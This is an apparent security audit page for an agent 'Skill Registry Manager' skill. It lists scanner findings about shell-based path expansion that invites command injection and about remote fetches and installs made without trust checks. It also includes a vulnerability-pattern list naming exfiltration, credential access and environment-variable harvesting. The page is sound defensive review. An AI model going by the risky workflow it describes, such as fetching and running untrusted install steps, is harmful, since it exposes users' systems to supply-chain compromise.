ClawHub
Back to skill

Security audit

Skill Registry Manager

Security checks across malware telemetry and agentic risk

Overview

This skill appears to be a skill installer/registry manager, but it gives agents broad installation and remote-fetch authority without enough safety gates or trust-boundary warnings.

Review this carefully before installing. Use it only with registries and repositories you trust, confirm every remote fetch and install command before it runs, avoid subscription paths containing shell metacharacters, and make sure installed skills can be inspected, pinned, and removed.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Findings (3)

Context-Inappropriate Capability

Medium
Confidence
95% confidence
Finding
The skill explicitly instructs expanding path variables using shell `echo`, which turns ordinary path handling into shell interpretation. If a subscription path or install path contains shell metacharacters or command substitutions, an implementation that follows this guidance could execute attacker-controlled commands while merely resolving a file path.

Missing User Warnings

Medium
Confidence
92% confidence
Finding
The README explicitly promotes remote subscriptions, recursive loading, and installation of skills from remote or local sources, but does not warn that these actions may fetch untrusted content and modify the local system. In a skill context, this increases the chance that users or agents will perform network retrieval and installation without understanding the trust boundary, enabling supply-chain abuse or unintended system changes.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
This skill is designed to fetch remote registries, clone repositories, run install commands, and copy local content into active skill directories, but it does not require trust checks, provenance validation, or an explicit warning before executing untrusted install steps. In this context, the omission is dangerous because the core workflow can directly introduce and execute attacker-controlled code from subscriptions or registry entries.

VirusTotal

65/65 vendors flagged this skill as clean.

View on VirusTotal